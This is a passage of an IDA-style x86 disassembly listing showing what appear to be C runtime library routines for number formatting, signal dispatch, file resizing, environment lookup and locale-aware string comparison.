test edi, 40000000h
jnz short loc_421F39
push 424C68h
jmp short loc_421F7F
; ---------------------------------------------------------------------------
loc_421F39: ; CODE XREF: sub_421E85+A3�j
; sub_421E85+AB�j
test cx, cx
jz short loc_421F53
cmp edi, 0C0000000h
jnz short loc_421F53
cmp [ebp+arg_0], 0
jnz short loc_421F7A
push 424C60h
jmp short loc_421F62
; ---------------------------------------------------------------------------
loc_421F53: ; CODE XREF: sub_421E85+B7�j
; sub_421E85+BF�j
cmp edi, eax
jnz short loc_421F7A
cmp [ebp+arg_0], 0
jnz short loc_421F7A
push 424C58h
loc_421F62: ; CODE XREF: sub_421E85+CC�j
lea eax, [ebx+4]
push eax
call sub_417FE0
pop ecx
mov byte ptr [ebx+3], 5
pop ecx
loc_421F71: ; CODE XREF: sub_421E85+109�j
and [ebp+var_4], 0
jmp loc_4220E8
; ---------------------------------------------------------------------------
loc_421F7A: ; CODE XREF: sub_421E85+C5�j
; sub_421E85+D0�j ...
push 424C50h
loc_421F7F: ; CODE XREF: sub_421E85+B2�j
lea eax, [ebx+4]
push eax
call sub_417FE0
pop ecx
mov byte ptr [ebx+3], 6
pop ecx
jmp short loc_421F71
; ---------------------------------------------------------------------------
loc_421F90: ; CODE XREF: sub_421E85+8F�j
movzx eax, dx
mov ecx, edi
mov esi, eax
shr ecx, 18h
imul eax, 4D10h
shr esi, 8
and [ebp+var_10], 0
push 1
lea ecx, [esi+ecx*2]
mov [ebp+var_6], dx
imul ecx, 4Dh
mov [ebp+var_A], edi
lea esi, [ecx+eax-134312F4h]
mov eax, [ebp+arg_0]
sar esi, 10h
mov [ebp+var_E], eax
movsx eax, si
neg eax
push eax
lea eax, [ebp+var_10]
push eax
call sub_42266D
add esp, 0Ch
cmp [ebp+var_6], 3FFFh
jb short loc_421FF1
lea eax, [ebp+var_1C]
inc esi
push eax
lea eax, [ebp+var_10]
push eax
call sub_42244D
pop ecx
pop ecx
loc_421FF1: ; CODE XREF: sub_421E85+15A�j
test [ebp+arg_10], 1
mov [ebx], si
jz short loc_42200B
mov edi, [ebp+arg_C]
movsx eax, si
add edi, eax
test edi, edi
jg short loc_42200E
jmp loc_421EFC
; ---------------------------------------------------------------------------
loc_42200B: ; CODE XREF: sub_421E85+173�j
mov edi, [ebp+arg_C]
loc_42200E: ; CODE XREF: sub_421E85+17F�j
cmp edi, 15h
jle short loc_422016
push 15h
pop edi
loc_422016: ; CODE XREF: sub_421E85+18C�j
movzx esi, [ebp+var_6]
sub esi, 3FFEh
and [ebp+var_6], 0
mov [ebp+arg_14], 8
loc_42202C: ; CODE XREF: sub_421E85+1B4�j
lea eax, [ebp+var_10]
push eax
call sub_421892
dec [ebp+arg_14]
pop ecx
jnz short loc_42202C
test esi, esi
jge short loc_422056
neg esi
and esi, 0FFh
jle short loc_422056
loc_422049: ; CODE XREF: sub_421E85+1CF�j
lea eax, [ebp+var_10]
push eax
call sub_4218C0
dec esi
pop ecx
jnz short loc_422049
loc_422056: ; CODE XREF: sub_421E85+1B8�j
; sub_421E85+1C2�j
lea ecx, [edi+1]
lea eax, [ebx+4]
test ecx, ecx
mov [ebp+arg_14], eax
jle short loc_4220B3
mov [ebp+arg_C], ecx
loc_422066: ; CODE XREF: sub_421E85+229�j
lea esi, [ebp+var_10]
lea edi, [ebp+arg_0]
movsd
movsd
lea eax, [ebp+var_10]
push eax
movsd
call sub_421892
lea eax, [ebp+var_10]
push eax
call sub_421892
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_421834
lea eax, [ebp+var_10]
push eax
call sub_421892
mov al, byte ptr [ebp+var_6+1]
mov ecx, [ebp+arg_14]
and byte ptr [ebp+var_6+1], 0
add esp, 14h
add al, 30h
inc [ebp+arg_14]
dec [ebp+arg_C]
mov [ecx], al
jnz short loc_422066
mov eax, [ebp+arg_14]
loc_4220B3: ; CODE XREF: sub_421E85+1DC�j
mov cl, [eax-1]
dec eax
dec eax
cmp cl, 35h
lea ecx, [ebx+4]
jl short loc_4220F0
loc_4220C0: ; CODE XREF: sub_421E85+248�j
cmp eax, ecx
jb short loc_4220D3
cmp byte ptr [eax], 39h
jnz short loc_4220CF
mov byte ptr [eax], 30h
dec eax
jmp short loc_4220C0
; ---------------------------------------------------------------------------
loc_4220CF: ; CODE XREF: sub_421E85+242�j
cmp eax, ecx
jnb short loc_4220D7
loc_4220D3: ; CODE XREF: sub_421E85+23D�j
inc eax
inc word ptr [ebx]
loc_4220D7: ; CODE XREF: sub_421E85+24C�j
inc byte ptr [eax]
loc_4220D9: ; CODE XREF: sub_421E85+279�j
sub al, bl
sub al, 3
mov [ebx+3], al
movsx eax, al
and byte ptr [eax+ebx+4], 0
loc_4220E8: ; CODE XREF: sub_421E85+F0�j
mov eax, [ebp+var_4]
loc_4220EB: ; CODE XREF: sub_421E85+291�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4220F0: ; CODE XREF: sub_421E85+239�j
; sub_421E85+275�j
cmp eax, ecx
jb short loc_422100
cmp byte ptr [eax], 30h
jnz short loc_4220FC
dec eax
jmp short loc_4220F0
; ---------------------------------------------------------------------------
loc_4220FC: ; CODE XREF: sub_421E85+272�j
cmp eax, ecx
jnb short loc_4220D9
loc_422100: ; CODE XREF: sub_421E85+26D�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ecx], 30h
loc_42210F: ; CODE XREF: sub_421E85+87�j
and byte ptr [ebx+5], 0
push 1
pop eax
jmp short loc_4220EB
sub_421E85 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422118 proc near ; CODE XREF: sub_41D7DC+32A0�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
mov eax, edi
dec eax
dec eax
jz short loc_42217F
dec eax
dec eax
jz short loc_422170
sub eax, 4
jz short loc_422170
sub eax, 3
jz short loc_422170
sub eax, 4
jz short loc_422163
sub eax, 6
jz short loc_422156
dec eax
jz short loc_422149
or eax, 0FFFFFFFFh
jmp loc_422241
; ---------------------------------------------------------------------------
loc_422149: ; CODE XREF: sub_422118+27�j
mov esi, dword ptr byte_445EDC+0D46BCh
mov eax, 51A598h
jmp short loc_42218A
; ---------------------------------------------------------------------------
loc_422156: ; CODE XREF: sub_422118+24�j
mov esi, dword ptr byte_445EDC+0D46B8h
mov eax, 51A594h
jmp short loc_42218A
; ---------------------------------------------------------------------------
loc_422163: ; CODE XREF: sub_422118+1F�j
mov esi, dword ptr byte_445EDC+0D46C0h
mov eax, 51A59Ch
jmp short loc_42218A
; ---------------------------------------------------------------------------
loc_422170: ; CODE XREF: sub_422118+10�j
; sub_422118+15�j ...
push edi
call sub_422245
mov esi, [eax+8]
add eax, 8
pop ecx
jmp short loc_42218A
; ---------------------------------------------------------------------------
loc_42217F: ; CODE XREF: sub_422118+C�j
mov esi, dword ptr byte_445EDC+0D46B4h
mov eax, 51A590h
loc_42218A: ; CODE XREF: sub_422118+3C�j
; sub_422118+49�j ...
cmp esi, 1
jnz short loc_422196
xor eax, eax
jmp loc_422241
; ---------------------------------------------------------------------------
loc_422196: ; CODE XREF: sub_422118+75�j
test esi, esi
jnz short loc_4221A1
push 3 ; uExitCode
call sub_41A246
loc_4221A1: ; CODE XREF: sub_422118+80�j
push ebx
push 8
pop ecx
cmp edi, ecx
jz short loc_4221B3
cmp edi, 0Bh
jz short loc_4221B3
cmp edi, 4
jnz short loc_4221D9
loc_4221B3: ; CODE XREF: sub_422118+8F�j
; sub_422118+94�j
mov ebx, dword ptr byte_445EDC+0D4498h
and dword ptr byte_445EDC+0D4498h, 0
cmp edi, ecx
jnz short loc_422208
mov edx, dword ptr unk_4403B4
mov dword ptr unk_4403B4, 8Ch
mov [ebp+arg_0], edx
jmp short loc_4221DC
; ---------------------------------------------------------------------------
loc_4221D9: ; CODE XREF: sub_422118+99�j
mov ebx, [ebp+arg_0]
loc_4221DC: ; CODE XREF: sub_422118+BF�j
cmp edi, ecx
jnz short loc_422208
mov eax, dword ptr unk_4403A8
mov ecx, dword ptr unk_4403AC
add ecx, eax
cmp eax, ecx
jge short loc_42220F
lea edx, [eax+eax*2]
sub ecx, eax
lea edx, ds:440338h[edx*4]
loc_4221FD: ; CODE XREF: sub_422118+EC�j
and dword ptr [edx], 0
add edx, 0Ch
dec ecx
jnz short loc_4221FD
jmp short loc_42220F
; ---------------------------------------------------------------------------
loc_422208: ; CODE XREF: sub_422118+AA�j
; sub_422118+C6�j
and dword ptr [eax], 0
cmp edi, ecx
jnz short loc_42221D
loc_42220F: ; CODE XREF: sub_422118+D7�j
; sub_422118+EE�j
push dword ptr unk_4403B4
push 8
call esi
pop ecx
pop ecx
jmp short loc_42222B
; ---------------------------------------------------------------------------
loc_42221D: ; CODE XREF: sub_422118+F5�j
push edi
call esi
cmp edi, 0Bh
pop ecx
jz short loc_42222B
cmp edi, 4
jnz short loc_42223E
loc_42222B: ; CODE XREF: sub_422118+103�j
; sub_422118+10C�j
cmp edi, 8
mov dword ptr byte_445EDC+0D4498h, ebx
jnz short loc_42223E
mov eax, [ebp+arg_0]
mov dword ptr unk_4403B4, eax
loc_42223E: ; CODE XREF: sub_422118+111�j
; sub_422118+11C�j
xor eax, eax
pop ebx
loc_422241: ; CODE XREF: sub_422118+2C�j
; sub_422118+79�j
pop edi
pop esi
pop ebp
retn
sub_422118 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_422245 proc near ; CODE XREF: sub_422118+59�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, dword ptr unk_4403B0
cmp dword ptr unk_440334, edx
push esi
mov eax, 440330h
jz short loc_422273
lea esi, [ecx+ecx*2]
lea esi, ds:440330h[esi*4]
loc_422267: ; CODE XREF: sub_422245+2C�j
add eax, 0Ch
cmp eax, esi
jnb short loc_422273
cmp [eax+4], edx
jnz short loc_422267
loc_422273: ; CODE XREF: sub_422245+16�j
; sub_422245+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:440330h[ecx*4]
cmp eax, ecx
jnb short loc_422287
cmp [eax+4], edx
jz short locret_422289
loc_422287: ; CODE XREF: sub_422245+3B�j
xor eax, eax
locret_422289: ; CODE XREF: sub_422245+40�j
retn
sub_422245 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42228A proc near ; CODE XREF: sub_420E27+271�p
Buffer = byte ptr -1000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_417F30
push ebx
mov ebx, [ebp+arg_0]
push esi
xor esi, esi
cmp ebx, dword ptr byte_445EDC+0D5A24h
jnb loc_4223BF
mov eax, ebx
mov ecx, ebx
sar eax, 5
and ecx, 1Fh
mov eax, dword ptr byte_445EDC+0D5924h[eax*4]
test byte ptr [eax+ecx*8+4], 1
jz loc_4223BF
push 1
push esi
push ebx
call sub_41EACB
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_4223C9
push 2
push esi
push ebx
call sub_41EACB
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_4223C9
push edi
mov edi, [ebp+arg_4]
sub edi, eax
test edi, edi
jle short loc_42236C
push 1000h
lea eax, [ebp+Buffer]
push esi
push eax
call sub_4179E0
push 8000h
push ebx
call sub_4226E9
add esp, 14h
mov [ebp+arg_4], eax
loc_422320: ; CODE XREF: sub_42228A+BD�j
mov eax, 1000h
cmp edi, eax
jge short loc_42232B
mov eax, edi
loc_42232B: ; CODE XREF: sub_42228A+9D�j
push eax ; nNumberOfBytesToWrite
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push ebx ; int
call sub_41F033
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_422349
sub edi, eax
test edi, edi
jle short loc_42235F
jmp short loc_422320
; ---------------------------------------------------------------------------
loc_422349: ; CODE XREF: sub_42228A+B5�j
cmp dword ptr byte_445EDC+0D43E8h, 5
jnz short loc_42235C
mov dword ptr byte_445EDC+0D43E4h, 0Dh
loc_42235C: ; CODE XREF: sub_42228A+C6�j
or esi, 0FFFFFFFFh
loc_42235F: ; CODE XREF: sub_42228A+BB�j
push [ebp+arg_4]
push ebx
call sub_4226E9
pop ecx
pop ecx
jmp short loc_4223AC
; ---------------------------------------------------------------------------
loc_42236C: ; CODE XREF: sub_42228A+71�j
jge short loc_4223AC
push 0
push [ebp+arg_4]
push ebx
call sub_41EACB
push ebx
call sub_420D93
add esp, 10h
push eax ; hFile
call SetEndOfFile ; SetEndOfFile
mov esi, eax
neg esi
sbb esi, esi
neg esi
dec esi
cmp esi, 0FFFFFFFFh
jnz short loc_4223AC
mov dword ptr byte_445EDC+0D43E4h, 0Dh
call GetLastError
mov dword ptr byte_445EDC+0D43E8h, eax
loc_4223AC: ; CODE XREF: sub_42228A+E0�j
; sub_42228A:loc_42236C�j ...
push 0
push [ebp+arg_0]
push ebx
call sub_41EACB
add esp, 0Ch
mov eax, esi
pop edi
jmp short loc_4223CC
; ---------------------------------------------------------------------------
loc_4223BF: ; CODE XREF: sub_42228A+1A�j
; sub_42228A+36�j
mov dword ptr byte_445EDC+0D43E4h, 9
loc_4223C9: ; CODE XREF: sub_42228A+4E�j
; sub_42228A+63�j
or eax, 0FFFFFFFFh
loc_4223CC: ; CODE XREF: sub_42228A+133�j
pop esi
pop ebx
leave
retn
sub_42228A endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4223D0(LPCSTR lpString2)
sub_4223D0 proc near ; CODE XREF: sub_4210F5+23�p
lpString2 = dword ptr 4
cmp dword ptr byte_445EDC+0D5A50h, 0
push ebx
push esi
mov esi, dword ptr byte_445EDC+0D440Ch
push edi
jz short loc_422447
test esi, esi
jnz short loc_422401
cmp dword ptr byte_445EDC+0D4414h, esi
jz short loc_422447
call sub_42279E
test eax, eax
jnz short loc_422447
mov esi, dword ptr byte_445EDC+0D440Ch
test esi, esi
jz short loc_422447
loc_422401: ; CODE XREF: sub_4223D0+14�j
mov ebx, [esp+0Ch+lpString2]
test ebx, ebx
jz short loc_422447
push ebx
call sub_4180D0
pop ecx
mov edi, eax
loc_422412: ; CODE XREF: sub_4223D0+6D�j
mov eax, [esi]
test eax, eax
jz short loc_422447
push eax
call sub_4180D0
cmp eax, edi
pop ecx
jbe short loc_42243A
mov eax, [esi]
cmp byte ptr [eax+edi], 3Dh
jnz short loc_42243A
push edi ; cchCount2
push ebx ; lpString2
push eax ; lpMultiByteStr
call sub_42275F
add esp, 0Ch
test eax, eax
jz short loc_42243F
loc_42243A: ; CODE XREF: sub_4223D0+51�j
; sub_4223D0+59�j
add esi, 4
jmp short loc_422412
; ---------------------------------------------------------------------------
loc_42243F: ; CODE XREF: sub_4223D0+68�j
mov eax, [esi]
lea eax, [eax+edi+1]
jmp short loc_422449
; ---------------------------------------------------------------------------
loc_422447: ; CODE XREF: sub_4223D0+10�j
; sub_4223D0+1C�j ...
xor eax, eax
loc_422449: ; CODE XREF: sub_4223D0+75�j
pop edi
pop esi
pop ebx
retn
sub_4223D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42244D proc near ; CODE XREF: sub_421E85+165�p
; sub_42266D+69�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov cx, [ebx+0Ah]
xor eax, eax
push edi
mov [ebp+var_14], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_1C], eax
mov ax, [esi+0Ah]
mov edi, ecx
mov edx, 7FFFh
xor edi, eax
and eax, edx
and ecx, edx
and edi, 8000h
cmp ax, 7FFFh
lea edx, [ecx+eax]
mov [ebp+arg_0], edx
jnb loc_42264D
cmp cx, 7FFFh
jnb loc_42264D
cmp dx, 0BFFDh
ja loc_42264D
cmp dx, 3FBFh
ja short loc_4224B6
xor eax, eax
jmp short loc_4224F0
; ---------------------------------------------------------------------------
loc_4224B6: ; CODE XREF: sub_42244D+63�j
test ax, ax
mov edx, 7FFFFFFFh
jnz short loc_4224D8
inc [ebp+arg_0]
test [esi+8], edx
jnz short loc_4224D8
xor eax, eax
cmp [esi+4], eax
jnz short loc_4224DA
cmp [esi], eax
jnz short loc_4224DA
jmp loc_422647
; ---------------------------------------------------------------------------
loc_4224D8: ; CODE XREF: sub_42244D+71�j
; sub_42244D+79�j
xor eax, eax
loc_4224DA: ; CODE XREF: sub_42244D+80�j
; sub_42244D+84�j
cmp cx, ax
jnz short loc_4224FD
inc [ebp+arg_0]
test [ebx+8], edx
jnz short loc_4224FD
cmp [ebx+4], eax
jnz short loc_4224FD
cmp [ebx], eax
jnz short loc_4224FD
loc_4224F0: ; CODE XREF: sub_42244D+67�j
mov [esi+8], eax
mov [esi+4], eax
mov [esi], eax
jmp loc_422668
; ---------------------------------------------------------------------------
loc_4224FD: ; CODE XREF: sub_42244D+90�j
; sub_42244D+98�j ...
mov [ebp+var_10], eax
lea eax, [ebp+var_20]
mov [ebp+var_4], eax
mov [ebp+arg_4], 5
loc_42250D: ; CODE XREF: sub_42244D+122�j
mov eax, [ebp+var_10]
add eax, eax
cmp [ebp+arg_4], 0
jle short loc_422561
add eax, esi
lea ecx, [ebx+8]
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], ecx
mov [ebp+var_18], eax
loc_422529: ; CODE XREF: sub_42244D+112�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
movzx eax, word ptr [eax]
movzx ecx, word ptr [ecx]
imul eax, ecx
mov ecx, [ebp+var_4]
add ecx, 0FFFFFFFCh
push ecx
push eax
push dword ptr [ecx]
call sub_421813
add esp, 0Ch
test eax, eax
jz short loc_422554
mov eax, [ebp+var_4]
inc word ptr [eax]
loc_422554: ; CODE XREF: sub_42244D+FF�j
add [ebp+var_8], 2
sub [ebp+var_C], 2
dec [ebp+var_18]
jnz short loc_422529
loc_422561: ; CODE XREF: sub_42244D+C9�j
add [ebp+var_4], 2
inc [ebp+var_10]
dec [ebp+arg_4]
cmp [ebp+arg_4], 0
jg short loc_42250D
add [ebp+arg_0], 0C002h
cmp word ptr [ebp+arg_0], 0
jle short loc_4225A4
loc_42257F: ; CODE XREF: sub_42244D+14E�j
test byte ptr [ebp+var_1C+3], 80h
jnz short loc_42259D
lea eax, [ebp+var_24]
push eax
call sub_421892
add [ebp+arg_0], 0FFFFh
pop ecx
cmp word ptr [ebp+arg_0], 0
jg short loc_42257F
loc_42259D: ; CODE XREF: sub_42244D+136�j
cmp word ptr [ebp+arg_0], 0
jg short loc_4225DD
loc_4225A4: ; CODE XREF: sub_42244D+130�j
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
jge short loc_4225DD
movsx eax, word ptr [ebp+arg_0]
neg eax
add [ebp+arg_0], eax
mov ebx, eax
loc_4225BD: ; CODE XREF: sub_42244D+184�j
test byte ptr [ebp+var_24], 1
jz short loc_4225C6
inc [ebp+var_14]
loc_4225C6: ; CODE XREF: sub_42244D+174�j
lea eax, [ebp+var_24]
push eax
call sub_4218C0
dec ebx
pop ecx
jnz short loc_4225BD
cmp [ebp+var_14], 0
jz short loc_4225DD
or byte ptr [ebp+var_24], 1
loc_4225DD: ; CODE XREF: sub_42244D+155�j
; sub_42244D+163�j ...
cmp word ptr [ebp+var_24], 8000h
ja short loc_4225F4
mov eax, [ebp+var_24]
and eax, 1FFFFh
cmp eax, 18000h
jnz short loc_422629
loc_4225F4: ; CODE XREF: sub_42244D+196�j
cmp [ebp+var_24+2], 0FFFFFFFFh
jnz short loc_422626
and [ebp+var_24+2], 0
cmp [ebp+var_20+2], 0FFFFFFFFh
jnz short loc_422621
and [ebp+var_20+2], 0
cmp word ptr [ebp+var_1C+2], 0FFFFh
jnz short loc_42261B
inc [ebp+arg_0]
mov word ptr [ebp+var_1C+2], 8000h
jmp short loc_422629
; ---------------------------------------------------------------------------
loc_42261B: ; CODE XREF: sub_42244D+1C1�j
inc word ptr [ebp+var_1C+2]
jmp short loc_422629
; ---------------------------------------------------------------------------
loc_422621: ; CODE XREF: sub_42244D+1B5�j
inc [ebp+var_20+2]
jmp short loc_422629
; ---------------------------------------------------------------------------
loc_422626: ; CODE XREF: sub_42244D+1AB�j
inc [ebp+var_24+2]
loc_422629: ; CODE XREF: sub_42244D+1A5�j
; sub_42244D+1CC�j ...
mov eax, [ebp+arg_0]
cmp ax, 7FFFh
jnb short loc_42264D
mov cx, word ptr [ebp+var_24+2]
or eax, edi
mov [esi], cx
mov ecx, [ebp+var_20]
mov [esi+2], ecx
mov ecx, [ebp+var_1C]
mov [esi+6], ecx
loc_422647: ; CODE XREF: sub_42244D+86�j
mov [esi+0Ah], ax
jmp short loc_422668
; ---------------------------------------------------------------------------
loc_42264D: ; CODE XREF: sub_42244D+42�j
; sub_42244D+4D�j ...
neg di
sbb edi, edi
and dword ptr [esi+4], 0
and edi, 80000000h
add edi, 7FFF8000h
and dword ptr [esi], 0
mov [esi+8], edi
loc_422668: ; CODE XREF: sub_42244D+AB�j
; sub_42244D+1FE�j
pop edi
pop esi
pop ebx
leave
retn
sub_42244D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42266D proc near ; CODE XREF: sub_4219B4+440�p
; sub_421E85+14C�p
var_C = byte ptr -0Ch
var_A = dword ptr -0Ah
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
mov ebx, 440820h
xor ecx, ecx
sub ebx, 60h
cmp [ebp+arg_4], ecx
jz short loc_4226E6
jge short loc_422695
mov eax, [ebp+arg_4]
mov ebx, 440980h
neg eax
mov [ebp+arg_4], eax
sub ebx, 60h
loc_422695: ; CODE XREF: sub_42266D+16�j
cmp [ebp+arg_8], ecx
jnz short loc_4226A0
mov eax, [ebp+arg_0]
mov [eax], cx
loc_4226A0: ; CODE XREF: sub_42266D+2B�j
cmp [ebp+arg_4], ecx
jz short loc_4226E6
push esi
push edi
loc_4226A7: ; CODE XREF: sub_42266D+75�j
mov eax, [ebp+arg_4]
add ebx, 54h
sar [ebp+arg_4], 3
and eax, 7
cmp eax, ecx
jz short loc_4226DF
lea eax, [eax+eax*2]
cmp word ptr [ebx+eax*4], 8000h
lea esi, [ebx+eax*4]
jb short loc_4226D2
lea edi, [ebp+var_C]
movsd
movsd
movsd
dec [ebp+var_A]
lea esi, [ebp+var_C]
loc_4226D2: ; CODE XREF: sub_42266D+57�j
push esi
push [ebp+arg_0]
call sub_42244D
pop ecx
pop ecx
xor ecx, ecx
loc_4226DF: ; CODE XREF: sub_42266D+49�j
cmp [ebp+arg_4], ecx
jnz short loc_4226A7
pop edi
pop esi
loc_4226E6: ; CODE XREF: sub_42266D+14�j
; sub_42266D+36�j
pop ebx
leave
retn
sub_42266D endp
; =============== S U B R O U T I N E =======================================
sub_4226E9 proc near ; CODE XREF: sub_42228A+8B�p
; sub_42228A+D9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
cmp eax, dword ptr byte_445EDC+0D5A24h
jnb short loc_422750
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword ptr byte_445EDC+0D5924h[ecx*4]
lea edx, [ecx+eax*8+4]
mov cl, [ecx+eax*8+4]
test cl, 1
jz short loc_422750
mov al, cl
mov esi, 8000h
and eax, 80h
cmp [esp+4+arg_4], esi
jnz short loc_422729
and cl, 7Fh
jmp short loc_422736
; ---------------------------------------------------------------------------
loc_422729: ; CODE XREF: sub_4226E9+39�j
cmp [esp+4+arg_4], 4000h
jnz short loc_422744
or cl, 80h
loc_422736: ; CODE XREF: sub_4226E9+3E�j
neg eax
sbb eax, eax
mov [edx], cl
and ax, 0C000h
add eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_422744: ; CODE XREF: sub_4226E9+48�j
mov dword ptr byte_445EDC+0D43E4h, 16h
jmp short loc_42275A
; ---------------------------------------------------------------------------
loc_422750: ; CODE XREF: sub_4226E9+B�j
; sub_4226E9+27�j
mov dword ptr byte_445EDC+0D43E4h, 9
loc_42275A: ; CODE XREF: sub_4226E9+65�j
or eax, 0FFFFFFFFh
pop esi
retn
sub_4226E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_42275F(LPCSTR lpMultiByteStr, LPCSTR lpString2, int cchCount2)
sub_42275F proc near ; CODE XREF: sub_4223D0+5E�p
; sub_422C3B+18�p
lpMultiByteStr = dword ptr 8
lpString2 = dword ptr 0Ch
cchCount2 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+cchCount2], 0
jnz short loc_42276C
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42276C: ; CODE XREF: sub_42275F+7�j
push dword ptr byte_445EDC+0D56E8h ; CodePage
push [ebp+cchCount2] ; cchCount2
push [ebp+lpString2] ; lpString2
push [ebp+cchCount2] ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
push 1 ; dwCmpFlags
push dword ptr byte_445EDC+0D5908h ; Locale
call sub_42280C
add esp, 1Ch
test eax, eax
jnz short loc_422799
mov eax, 7FFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_422799: ; CODE XREF: sub_42275F+31�j
add eax, 0FFFFFFFEh
pop ebp
retn
sub_42275F endp
; =============== S U B R O U T I N E =======================================
sub_42279E proc near ; CODE XREF: sub_4223D0+1E�p
; sub_422AB4+5B�p
lpMultiByteStr = dword ptr -4
push ecx
push ebx
push ebp
push esi
mov esi, dword ptr byte_445EDC+0D4414h
push edi
xor edi, edi
mov eax, [esi]
cmp eax, edi
jz short loc_4227FF
mov ebx, WideCharToMultiByte
loc_4227B7: ; CODE XREF: sub_42279E+5F�j
push edi ; lpUsedDefaultChar
push edi ; lpDefaultChar
push edi ; cbMultiByte
push edi ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push eax ; lpWideCharStr
push edi ; dwFlags
push 1 ; CodePage
call ebx ; WideCharToMultiByte
mov ebp, eax
cmp ebp, edi
jz short loc_422807
push ebp
call sub_418175
cmp eax, edi
pop ecx
mov [esp+14h+lpMultiByteStr], eax
jz short loc_422807
push edi ; lpUsedDefaultChar
push edi ; lpDefaultChar
push ebp ; cbMultiByte
push eax ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push dword ptr [esi] ; lpWideCharStr
push edi ; dwFlags
push 1 ; CodePage
call ebx ; WideCharToMultiByte
test eax, eax
jz short loc_422807
push edi ; int
push [esp+18h+lpMultiByteStr] ; lpMultiByteStr
call sub_422AB4
mov eax, [esi+4]
add esi, 4
pop ecx
cmp eax, edi
pop ecx
jnz short loc_4227B7
loc_4227FF: ; CODE XREF: sub_42279E+11�j
xor eax, eax
loc_422801: ; CODE XREF: sub_42279E+6C�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_422807: ; CODE XREF: sub_42279E+29�j
; sub_42279E+38�j ...
or eax, 0FFFFFFFFh
jmp short loc_422801
sub_42279E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_42280C(LCID Locale, DWORD dwCmpFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPCSTR lpString2, int cchCount2, UINT CodePage)
sub_42280C proc near ; CODE XREF: sub_42275F+27�p
CPInfo = _cpinfo ptr -3Ch
var_28 = dword ptr -28h
lpString1 = dword ptr -24h
var_20 = dword ptr -20h
cchCount1 = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
Locale = dword ptr 8
dwCmpFlags = dword ptr 0Ch
lpMultiByteStr = dword ptr 10h
cbMultiByte = dword ptr 14h
lpString2 = dword ptr 18h
cchCount2 = dword ptr 1Ch
CodePage = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push 424C70h
push offset sub_41FD98
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
cmp dword ptr byte_445EDC+0D46CCh, ebx
push 1
pop edi
jnz short loc_42287F
push edi ; cchCount2
mov eax, offset SrcStr
push eax ; lpString2
push edi ; cchCount1
push eax ; lpString1
push ebx ; dwCmpFlags
push ebx ; Locale
call CompareStringW ; CompareStringW
test eax, eax
jz short loc_42285C
mov dword ptr byte_445EDC+0D46CCh, edi
jmp short loc_42287F
; ---------------------------------------------------------------------------
loc_42285C: ; CODE XREF: sub_42280C+46�j
push edi ; cchCount2
mov eax, offset byte_440FAC
push eax ; lpString2
push edi ; cchCount1
push eax ; lpString1
push ebx ; dwCmpFlags
push ebx ; Locale
call CompareStringA ; CompareStringA
test eax, eax
jz loc_422A75
mov dword ptr byte_445EDC+0D46CCh, 2
loc_42287F: ; CODE XREF: sub_42280C+31�j
; sub_42280C+4E�j
mov esi, [ebp+cbMultiByte]
cmp esi, ebx
jle short loc_422896
push esi
push [ebp+lpMultiByteStr]
call sub_422A89
pop ecx
pop ecx
mov esi, eax
mov [ebp+cbMultiByte], esi
loc_422896: ; CODE XREF: sub_42280C+78�j
cmp [ebp+cchCount2], ebx
jle short loc_4228AB
push [ebp+cchCount2]
